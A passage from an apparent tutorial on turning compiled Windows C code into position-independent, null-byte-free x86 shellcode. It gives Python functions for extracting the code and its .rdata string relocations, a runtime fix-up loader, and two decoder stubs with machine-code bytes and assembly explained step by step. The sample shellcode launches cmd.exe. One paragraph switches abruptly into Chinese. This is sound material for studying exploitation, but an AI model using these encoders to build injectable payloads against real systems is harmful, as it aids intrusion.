        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None
 
    return shellcode_len
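For quick experiments it can help to run the same parsing logic on a few lines copied from the map file. The sketch below is a Python 3 variant of get_shellcode_len that takes the lines directly instead of a file name. The name shellcode_len_from_map_lines is hypothetical. Unlike the original, it also skips blank lines.

```python
def shellcode_len_from_map_lines(lines):
    """Return the offset of _main in section 0001, i.e. the shellcode length.

    Hypothetical Python 3 variant of get_shellcode_len() that works on an
    iterable of map-file lines instead of opening a file.
    """
    lib_object = None
    shellcode_len = None
    for line in lines:
        parts = line.split()
        if not parts:
            continue                          # skip blank lines
        if lib_object is not None:
            # The symbol right after _main must belong to another object file,
            # otherwise _main is not the last function of the shellcode.
            if parts[-1] == lib_object:
                raise ValueError('_main is not the last function of %s' % lib_object)
            break
        if len(parts) > 2 and parts[1] == '_main':
            # Format: 0001:00000266  _main  00401266 f  shellcode.obj
            shellcode_len = int(parts[0].split(':')[1], 16)
            lib_object = parts[-1]
    if shellcode_len is None:
        raise ValueError('Cannot determine shellcode length')
    return shellcode_len


sample = """\
 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 0001:00000266       _main                      00401266 f   shellcode.obj
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
""".splitlines()

print(hex(shellcode_len_from_map_lines(sample)))   # 0x266
```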

Extracting the shellcode

This part is very easy. We know the length of the shellcode and we know that it is located at the beginning of the .text section. Here's the code:

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                <snip>
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
<snip>

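I used the pefile module. The relevant part is the body of the if statement.

Strings and .rdata

As we said before, our C/C++ code may contain strings. For instance, our shellcode contains the following line:

My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

The string cmd.exe is located in the .rdata section, a read-only section that contains initialized data. The code refers to the string by its absolute address: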

00241152 50                   push        eax  
00241153 8D 44 24 5C          lea         eax,[esp+5Ch]  
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h  
00241162 50                   push        eax  
00241163 52                   push        edx  
00241164 52                   push        edx  
00241165 52                   push        edx  
00241166 6A 01                push        1  
00241168 52                   push        edx  
00241169 52                   push        edx  
0024116A 68 18 21 24 00       push        242118h         <------------------------
0024116F 52                   push        edx  
00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi  
00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi  
0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi  
00241185 FF 54 24 34          call        dword ptr [esp+34h]

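As we can see, the absolute address of cmd.exe is 242118h. Note that this address is part of a push instruction and is itself located at 24116Bh. If we examine the executable file with a hex editor, we see the following:

56A: 68 18 21 40 00           push        000402118h

56Ah is the offset of the instruction in the file. Once the file is mapped, the instruction is at virtual address 40116Ah, that is, at RVA 116Ah from the image base 400000h. The image base is the preferred address at which the executable is loaded in memory. The absolute address in the instruction, 402118h, is correct if the executable is loaded at its preferred base address. If the executable is loaded at a different base address, the instruction needs to be fixed. How does Windows know which locations of the executable contain addresses that need to be fixed? The PE file contains a Relocation Directory, which in our case points to the .reloc section. The Relocation Directory contains the RVAs of all the locations that need to be fixed.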
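The arithmetic behind such a fix can be checked against the numbers above. This is a minimal sketch. It assumes the debugger listing was captured with the module loaded at 240000h, which is inferred from 0024116A in the listing versus 40116Ah in the file. The name rebase is illustrative.

```python
PREFERRED_BASE = 0x400000   # "Preferred load address is 00400000" (map file)
ACTUAL_BASE = 0x240000      # assumption: load address in the debugger session


def rebase(va, preferred=PREFERRED_BASE, actual=ACTUAL_BASE):
    """Shift an absolute address by the load delta, as a 32-bit relocation does."""
    return (va - preferred + actual) & 0xFFFFFFFF


print(hex(0x402118 - PREFERRED_BASE))   # 0x2118: RVA of "cmd.exe"
print(hex(rebase(0x402118)))            # 0x242118: PUSH operand after relocation
print(hex(rebase(0x40116B)))            # 0x24116b: where that operand lives in memory
```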

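We can inspect this directory and look for the addresses of the locations that

1. are contained in the shellcode (i.e. from .text:0 up to, but not including, main), and
2. contain pointers to data in .rdata.

For example, among other addresses, the Relocation Directory contains 40116Bh. This is the address of the last four bytes of the instruction push 402118h. Those bytes form the address 402118h, which points to the string cmd.exe in .rdata (the section starts at 402000h).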
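The Relocation Directory is a sequence of blocks. Each block starts with two DWORDs: the RVA of a 4 KB page and the size of the block. These are followed by 16-bit entries. The top 4 bits of an entry are the relocation type and the low 12 bits are the offset within the page. The sketch below parses raw relocation data using only struct. parse_reloc_blocks and the sample block are illustrative, not part of the article's script. Entries of type 0 (IMAGE_REL_BASED_ABSOLUTE) are padding that keeps blocks 32-bit aligned. Their computed RVA is simply the page RVA.

```python
import struct

IMAGE_REL_BASED_ABSOLUTE = 0   # padding entry: nothing to fix
IMAGE_REL_BASED_HIGHLOW = 3    # fix a full 32-bit address


def parse_reloc_blocks(data):
    """Yield (rva, type) for every entry of raw base-relocation data."""
    pos = 0
    while pos + 8 <= len(data):
        page_rva, block_size = struct.unpack_from('<II', data, pos)
        if block_size < 8:
            break                                   # malformed or terminating block
        end = min(pos + block_size, len(data))
        for off in range(pos + 8, end - 1, 2):      # 16-bit entries after the header
            (entry,) = struct.unpack_from('<H', data, off)
            yield page_rva + (entry & 0x0FFF), entry >> 12
        pos += block_size


# One block for page 1000h: a HIGHLOW entry at offset 16Bh plus one padding entry.
block = struct.pack('<IIHH', 0x1000, 12, (IMAGE_REL_BASED_HIGHLOW << 12) | 0x16B, 0)
entries = list(parse_reloc_blocks(block))
print([(hex(rva), t) for rva, t in entries])   # [('0x116b', 3), ('0x1000', 0)]
```

Only the entries whose type is not IMAGE_REL_BASED_ABSOLUTE describe locations to fix.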

Let's look at the function get_shellcode_and_relocs. In the first part, we extract the .rdata section:

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                <snip>
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')

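The relevant part is the body of the elif.

Next, we analyze the relocations. We look for the locations within our shellcode and extract from .rdata the null-terminated strings referenced by those locations.

As we already said, we're only interested in locations contained in our shellcode. Here's the relevant part of the function get_shellcode_and_relocs: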

        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries:
                if entry.type == 0:
                    # IMAGE_REL_BASED_ABSOLUTE: padding that aligns the block to 32 bits
                    # (its rva equals the base_rva); there's nothing to fix.
                    continue
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str
 
        return (shellcode, relocs, addr_to_strings)

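pe.DIRECTORY_ENTRY_BASERELOC is a list of data structures, one per relocation block. Each structure has a field entries that contains the relocations of that block. First we check whether the current relocation is within the shellcode. If it is, we do the following:

1. append to relocs the offset of the relocation relative to the start of the shellcode;

2. extract from the shellcode the DWORD at that offset and check that it points to data in .rdata;

3. extract from .rdata the null-terminated string that starts at the address found in (2);

4. add the string to addr_to_strings.

Note that:

i. relocs contains the offsets of the relocations within the shellcode, i.e. the offsets of the DWORDs in the shellcode that need to be fixed so that they point to the strings;

ii. addr_to_strings is a dictionary that maps each address found in (2) to the corresponding string.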
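Steps 1 to 4 can be tried on a toy image without pefile. In this sketch, the image is a flat byte string in which the index equals the RVA. collect_string_refs and the toy layout are hypothetical. Like the article's script, the sketch keeps the terminating null in each string, which main() strips with s[:-1] when printing.

```python
import struct


def collect_string_refs(image, image_base, reloc_rvas,
                        sc_start, sc_end, rd_start, rd_end):
    """Return (relocs, addr_to_strings) for relocations inside [sc_start, sc_end)."""
    relocs = []
    addr_to_strings = {}
    for rva in reloc_rvas:
        if not (sc_start <= rva < sc_end):
            continue                                        # not inside the shellcode
        relocs.append(rva - sc_start)                       # step 1: offset in shellcode
        (string_va,) = struct.unpack_from('<I', image, rva)  # step 2: the pointer
        string_rva = string_va - image_base
        if not (rd_start <= string_rva < rd_end):
            raise ValueError('shellcode references a section other than .rdata')
        end = image.find(b'\0', string_rva, rd_end)         # step 3: C string
        if end == -1:
            raise ValueError('Cannot extract string from .rdata')
        addr_to_strings[string_va] = image[string_rva:end + 1]  # step 4, keeps '\0'
    return relocs, addr_to_strings


IMAGE_BASE = 0x400000
image = bytearray(0x40)                              # "shellcode" 0x00-0x10, ".rdata" 0x20-0x40
image[4] = 0x68                                      # PUSH imm32
struct.pack_into('<I', image, 5, IMAGE_BASE + 0x20)  # absolute VA of the string
image[0x20:0x28] = b'cmd.exe\0'
image = bytes(image)

relocs, strings = collect_string_refs(image, IMAGE_BASE, [5, 0x30],
                                      0x00, 0x10, 0x20, 0x40)
print(relocs, strings)   # [5] {4194336: b'cmd.exe\x00'}
```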

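Adding the loader to the shellcode

The idea is to append the strings contained in addr_to_strings to the end of our shellcode and then make our code reference those strings.

Unfortunately, the code->strings linking must be done at runtime because we don't know the starting address of the shellcode. To do this, we prepend a "loader" that fixes the shellcode at runtime. This is the structure of the shellcode after the transformation: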

[Figure: layout of the transformed shellcode: loader | original shellcode | off1|off2|... | str1|str2|...]

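offX are DWORDs that point to the locations in the original shellcode that need to be fixed. The loader fixes these locations so that they point to the correct strings strX. Study the following code to see how it works: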

def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations
 
    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...
 
    delta = 21                                      # shellcode_start - here
 
    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]
 
    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)
 
    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])
 
    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)

Let's look at the loader:

CALL here                   ; PUSH EIP+5; JMP here
  here:
    POP ESI                     ; ESI = address of "here"
    MOV EDI, ESI                ; EDI = address of "here"
    ADD ESI, shellcode_start + len(shellcode) - here        ; ESI = address of off1
    MOV ECX, len(relocs)        ; ECX = number of locations to fix
    CLD                         ; tells LODSD to go forwards
  again:
    LODSD                       ; EAX = offX; ESI += 4
    ADD [EDI+EAX], EDI          ; fixes location within shellcode
    LOOP again                  ; DEC ECX; if ECX > 0 then JMP again
  shellcode_start:
    <shellcode>
  relocs:
    off1|off2|...
    str1|str2|...

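First, CALL is used to get the absolute address of here in memory. The loader uses this address to fix the offsets within the original shellcode. ESI points to off1, so LODSD reads the offsets one by one. The instruction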

ADD [EDI+EAX], EDI

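fixes a location within the shellcode. EAX is the current offX, which is the offset of that location relative to here. This means that EDI+EAX is the absolute address of the location. The DWORD at that location contains the offset of a string relative to here. By adding EDI to that DWORD, we turn it into the absolute address of the string. When the loader has finished, the fixed shellcode is executed.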
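The effect of the fix-up loop can be emulated in Python. This is a sketch under stated assumptions: run_loader and the toy layout are illustrative, offsets are relative to here, 21 NOP bytes stand in for the loader body (the delta used by add_loader_to_shellcode), and here is assumed to be at 10000000h.

```python
import struct

LOADER_LEN = 21        # shellcode_start - here, as in add_loader_to_shellcode
HERE = 0x10000000      # assumed absolute address of "here" (what POP ESI yields)


def run_loader(blob, here_addr, relocs_pos, n_relocs):
    """Emulate the loop: for each offX, ADD DWORD [here + offX], here.

    blob starts at the "here" label (the 5-byte CALL is not included).
    """
    mem = bytearray(blob)
    esi = relocs_pos                                   # ESI -> off1
    for _ in range(n_relocs):                          # MOV ECX, len(relocs) / LOOP again
        (eax,) = struct.unpack_from('<I', mem, esi)    # LODSD: EAX = offX
        esi += 4
        (dword,) = struct.unpack_from('<I', mem, eax)  # DWORD at here + offX
        struct.pack_into('<I', mem, eax, (dword + here_addr) & 0xFFFFFFFF)
    return bytes(mem)


# Toy layout (offsets from "here"):
#   0..20  loader body (NOPs), 21 PUSH imm32 with imm = 31, 26 RET,
#   27     off1 = 22 (offset of the PUSH operand), 31 "cmd.exe\0"
shellcode = b'\x68' + struct.pack('<I', 31) + b'\xC3'
blob = (b'\x90' * LOADER_LEN + shellcode +
        struct.pack('<I', LOADER_LEN + 1) + b'cmd.exe\0')
fixed = run_loader(blob, HERE, LOADER_LEN + len(shellcode), 1)
print(hex(struct.unpack_from('<I', fixed, 22)[0]))   # 0x1000001f
```

After the loop, the PUSH operand holds HERE + 31, the absolute address of "cmd.exe".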

To sum up, add_loader_to_shellcode is called only if there are relocations. You can see this in the main function:

<snip>
    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')
<snip>

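Removing null bytes from the shellcode (I)

I wrote two functions to remove null bytes:

1. get_fixed_shellcode_single_block
2. get_fixed_shellcode

The first function produces shorter code but doesn't always work. The second produces longer code but works in almost every case.

Let's start with get_fixed_shellcode_single_block, which is defined as follows: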

def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''
 
    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]
 
    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))

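We analyze the shellcode byte by byte to see whether there is a missing value, i.e. a byte value that never appears in the shellcode. Let's say this value is 0x14. If we replace every 0x00 in the shellcode with 0x14, the shellcode no longer contains null bytes. It won't work either, though, since it has been modified. The last step is to prepend to the shellcode a decoder that, at runtime, restores the null bytes before the original shellcode is executed. Here's the decoder: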

CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of original shellcode
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop1:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode
  CMP AL, <missing byte>                      ; is AL the special byte?
  CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0
  STOSB                                       ; overwrite the current byte of the shellcode with AL
  LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1
shellcode_begin:
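The encode/decode round trip can be sketched in Python 3. encode_single_block mirrors the missing-byte search of get_fixed_shellcode_single_block. decode_single_block mimics what the decoder loop does at runtime. Both names are hypothetical, and this is an illustration, not the article's code.

```python
def encode_single_block(shellcode):
    """Return (missing_byte, encoded) or None if every non-null value occurs."""
    present = set(shellcode)
    missing = [b for b in range(1, 256) if b not in present]
    if not missing:
        return None                      # the single-block trick can't be used
    m = missing[0]
    return m, shellcode.replace(b'\0', bytes([m]))


def decode_single_block(m, encoded):
    """Runtime decoder: every byte equal to m becomes 0x00 again."""
    out = bytearray(encoded)
    for i, b in enumerate(out):          # MOV AL,[EDI] / CMP AL,m / CMOVE EAX,ESI / STOSB
        if b == m:
            out[i] = 0
    return bytes(out)


sc = bytes([0x6A, 0x00, 0xB9, 0x00, 0x04, 0x00, 0x00, 0xC3])
m, enc = encode_single_block(sc)
print(hex(m), enc.hex())                 # 0x1 6a01b9010401 01c3 without the space
```

The roundtrip only works because m never occurs in the original shellcode, so every m in the encoded bytes must have been a null byte.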

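There are two important details to discuss. First, this code can't contain null bytes itself, or we would need yet another piece of code to remove them.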


As you can see, the CALL doesn't simply jump to here, because the instruction

E8 00 00 00 00               #   CALL here

contains four null bytes. Since CALL is 5 bytes long, CALL here is equivalent to CALL $+5. The trick to get rid of the null bytes is to use CALL $+4:

E8 FF FF FF FF               #   CALL $+4

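That CALL skips 4 bytes and jumps to the last FF of the CALL itself. The CALL is followed by the byte C0, so after the CALL the instruction INC EAX, whose opcode is FF C0, is executed. Note that the value pushed onto the stack by the CALL is still the absolute address of the here label.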
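The CALL $+4 trick can be checked by decoding the signed rel32 operand. In this sketch, call_target is a hypothetical helper and offsets are relative to the start of the decoder.

```python
import struct


def call_target(code, call_offset):
    """Return (pushed return offset, jump target offset) of an E8 rel32 CALL."""
    assert code[call_offset] == 0xE8
    (rel32,) = struct.unpack_from('<i', code, call_offset + 1)   # signed displacement
    next_ip = call_offset + 5        # address after the CALL = value pushed on the stack
    return next_ip, next_ip + rel32


code = bytes([0xE8, 0xFF, 0xFF, 0xFF, 0xFF, 0xC0, 0x5F])   # CALL $+4 / (FF)C0 / POP EDI
ret, target = call_target(code, 0)
print(ret, target, code[target:target + 2].hex())          # 5 4 ffc0
```

The pushed value (5) is the offset of here, while execution resumes at offset 4, where FF C0 decodes as INC EAX.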

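Here's the second trick to avoid null bytes:

MOV ECX, <xor value 1 for shellcode len>
XOR ECX, <xor value 2 for shellcode len>

We could just use:

MOV ECX, <shellcode len>

but this would produce null bytes. For instance, if the shellcode were 0x400 bytes long, we would get the instruction

B9 00 04 00 00 MOV ECX, 400h

which contains 3 null bytes.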

To avoid this, we choose a non-null byte that doesn't appear in 00000400h, say 0x01. Now we compute:

<xor value 1 for shellcode len> = 00000400h xor 01010101h = 01010501h
<xor value 2 for shellcode len> = 01010101h

Neither <xor value 1 for shellcode len> nor <xor value 2 for shellcode len> contains null bytes, and XORing them gives back the original value, 400h.

The two instructions become:

B9 01 05 01 01        MOV ECX, 01010501h
81 F1 01 01 01 01     XOR ECX, 01010101h

The xor values are computed by the function get_xor_values.
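The same idea as get_xor_values can be sketched in Python 3 for the length 400h. The sketch also assembles the two instructions so the bytes can be compared with the listing above. xor_split is a hypothetical name.

```python
import struct


def xor_split(value):
    """Split a DWORD into two null-free little-endian DWORDs x, y with x ^ y == value."""
    raw = struct.pack('<I', value)
    k = next(b for b in range(1, 256) if b not in raw)   # non-null byte absent from value
    x = bytes(a ^ k for a in raw)                        # no byte of x can be 0
    y = bytes([k]) * 4
    return x, y


x, y = xor_split(0x400)
mov_ecx = b'\xB9' + x          # MOV ECX, imm32
xor_ecx = b'\x81\xF1' + y      # XOR ECX, imm32
print(mov_ecx.hex(), xor_ecx.hex())   # b901050101 81f101010101
```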

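As said above, the rest of the decoder is easy to understand. It scans the shellcode byte by byte and overwrites with a null byte every byte equal to the special value (0x14 in the previous example).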

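Removing null bytes from the shellcode (II)

The method above fails if we can't find a byte value that never appears in the shellcode. In that case we need to use get_fixed_shellcode, which is more complex.

The idea is to divide the shellcode into blocks of 254 bytes. Every block must have a "missing byte", because a byte can take 255 non-zero values while a block holds only 254 bytes. We could choose a missing byte for each block and handle every block separately. That wouldn't be very efficient, though. For a shellcode of 254*N bytes, we would need to store N "missing bytes" before or after the shellcode, because the decoder needs to know them. It's more efficient to use the same "missing byte" for as many 254-byte blocks as possible. We start from the beginning of the shellcode and keep adding blocks to the current group as long as at least one non-null value is missing from all of them. When the next block would leave no missing value, we close the group and start a new one with that block. We continue until the last block has been processed. In the end, we have a list of <missing_byte, num_blocks> pairs: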

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]

I decided to limit num_blocksX to a single byte, so num_blocksX is between 1 and 255.

Here's the part of get_fixed_shellcode that splits the shellcode into blocks:

def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''
 
    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))
 
        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
<snip>
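The same grouping loop can be written as a small Python 3 function that returns the pairs directly. group_blocks is a hypothetical name, and the function is meant as an illustration rather than a drop-in replacement.

```python
def group_blocks(shellcode, block_size=254):
    """Return [(missing_byte, num_blocks), ...] covering shellcode block by block."""
    groups = []
    i = 0
    while i < len(shellcode):
        missing = list(range(1, 256))        # candidates for this group
        num_blocks = 0
        while i < len(shellcode) and num_blocks < 255:
            present = set(shellcode[i:i + block_size])
            still_missing = [b for b in missing if b not in present]
            if not still_missing:
                break                        # this block will start the next group
            missing = still_missing
            num_blocks += 1
            i += block_size
        # A fresh group always accepts its first block: 254 bytes can't
        # contain all 255 non-null values, so num_blocks >= 1 here.
        groups.append((missing[0], num_blocks))
    return groups


print(group_blocks(bytes(range(256)) * 2))   # [(254, 1), (252, 1), (1, 1)]
```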

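As before, we need to discuss the "decoder" that is prepended to the shellcode. This decoder is longer than the previous one, but the principle is the same.

Here's the code: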

code = ([
    0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                        # bytes:
    bytes_blocks + [                                    #   ...
                                                        # skip_bytes:
    0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                        # here:
    0xC0,                                               #   (FF)C0 = INC EAX
    0x5F,                                               #   POP EDI
    0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
    0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
    0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
    0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                        # loop1:
    0xB0, 0xFE,                                         #   MOV AL, 0FEh
    0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
    0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
    0x33, 0xF6,                                         #   XOR ESI, ESI
    0xFC,                                               #   CLD
                                                        # loop2:
    0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
    0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
    0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
    0xAA,                                               #   STOSB
    0x49,                                               #   DEC ECX
    0x74, 0x07,                                         #   JE shellcode_begin
    0x4A,                                               #   DEC EDX
    0x75, 0xF2,                                         #   JNE loop2
    0x43,                                               #   INC EBX
    0x43,                                               #   INC EBX
    0xEB, 0xE3                                          #   JMP loop1
                                                        # shellcode_begin:
])

bytes_blocks is the array:

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]

We discussed this array earlier, but not in terms of pairs.

注意代码始于跳过bytes_blocksJMP SHORT指令。为了实现该操作,len(bytes_blocks)必须小于或等于0x7F。但是正如你所看到的,len(bytes_blocks) 也出现在另一条指令中:

0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]

This requires len(bytes_blocks) to be less than or equal to 0x7F - 5, so this is the binding condition. If it's violated, the script gives up:

if len(bytes_blocks) > 0x7f - 5:
    # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
    return None
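The relative operands in the prefix can be checked with a little arithmetic. The sketch below uses hypothetical helper names and encodes the operands the way the decoder does. JMP SHORT jumps over n = len(bytes_blocks) bytes. LEA uses bytes - here = -(n + 5), because the 5-byte CALL sits between bytes and here. CALL's rel32 of 0xFFFFFFFF (-1) lands one byte before here, on the last 0xFF, so the CPU executes FF C0 (INC EAX). A signed 8-bit displacement reaches down to -0x80, so strictly the LEA would still fit for n = 0x7B. The script's 0x7F - 5 bound is therefore one byte more conservative than necessary.

```python
from typing import Tuple


def to_rel8(value: int) -> int:
    """Encode value as a signed 8-bit operand (rel8/disp8), or raise if it doesn't fit."""
    if not -0x80 <= value <= 0x7F:
        raise ValueError(f"{value} does not fit in a signed byte")
    return value & 0xFF


def prefix_operands(n: int) -> Tuple[int, int]:
    """Operands that depend on n = len(bytes_blocks)."""
    jmp_rel8 = to_rel8(n)            # JMP SHORT skip_bytes: skip the n data bytes
    lea_disp8 = to_rel8(-(n + 5))    # LEA EBX, [EDI + (bytes - here)]
    return jmp_rel8, lea_disp8


def call_target(call_addr: int, rel32: bytes) -> int:
    """Where CALL rel32 (opcode E8, 5 bytes long) transfers control."""
    return call_addr + 5 + int.from_bytes(rel32, "little", signed=True)
```

Suppose the CALL is at address 0x1000. Then `call_target(0x1000, b"\xff\xff\xff\xff")` is 0x1004, one byte before here (0x1005). `prefix_operands(2)` gives `(0x02, 0xF9)`.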

Let's examine the code in more detail:

JMP SHORT skip_bytes
bytes:
  ...
skip_bytes:
  CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = absolute address of "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  LEA EBX, [EDI + (bytes - here)]             ; EBX = absolute address of "bytes"
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of the shellcode
loop1:
  MOV AL, 0FEh                                ; AL = 254
  MUL AL, BYTE PTR [EBX+1]                    ; AX = 254 * current num_blocksX = num bytes
  MOVZX EDX, AX                               ; EDX = num bytes of the current chunk
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
